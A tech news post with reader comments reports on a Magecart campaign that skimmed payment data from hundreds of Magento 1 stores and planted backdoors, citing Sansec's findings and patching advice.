Magecart skimmed credit card info and created multiple backdoors in hundreds of e-commerce...

Cal Jeffrey

Posts: 4,154   +1,416
Staff member
In a nutshell: Magecart has struck again, and e-commerce sites are in a terrible pickle this time. The hacking groups have hit online businesses with malware intended to skim customer transaction information, which is nothing new. What is new is that the malicious code also opened at least 19 backdoors in the stores so that if admins remove it, hackers can quickly get back into the site.

Security researchers at Sansec say that they discovered that more than 500 online stores running the Magento 1 e-commerce platform were compromised in January. The hackers used a combination of SQL injection (SQLi) and PHP Object Injection (POI) to take over the Magento platform. Then a domain called "naturalfreshmall" served the malware to the now vulnerable sites.

"The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form," Sansec tweeted. "Payments are sent to https://naturalfreshmall[.]com/payment/Payment.php."

With control over Magento, specifically, a plugin called "Quickview," Magecart executed a man-in-the-middle attack. Malware posing as a payment popup skimmed transaction data and sent it to Magecart-controlled servers.

Furthermore, the malicious payload contained files that created at least 19 backdoors to the websites. So removing the malware is not an effective mitigation. Administrators must first identify and remove all of the backdoors and then patch the compromised CMS.

Sansec says the vulnerability lies in a depreciated version of Magento 1 software from 2020. To patch their payment platforms, admins need to upgrade to the newest version of Adobe Commerce or use Magento 1 patches that they can download from the OpenMage project.

Permalink to story.

 
Here's an obvious case of the seller not keeping up with the times and endangering all their customers. They need to be held directly responsible for every loss attributed to their negligence!
 
Here's an obvious case of the seller not keeping up with the times and endangering all their customers. They need to be held directly responsible for every loss attributed to their negligence!

Perhaps a seller is'nt fully aware of the dangers of running an outdated CMS. Or the costs to maintain it are just too high for it's purpose. I mean what good is running a shop with approx 1500 maintaince costs a year if the revenue is not even passing that?

2nd: credit cards are the most safest. You see a transaction you did'nt commit? You can return it.

Servers need to be patched up. Tip if your on Apache / Litespeed, Mod Security with Owasp ruleset. That will block any potential injection such as Sql, PHP or XSS and you can completely finetune what is being submitted to your website.

Because of that, I actually do run a very outdated website that is getting attacked on daily basis but is safe because of that! So even if you have a outdated website (it's not recommended) you still have a last resort which works perfectly well.
 
Back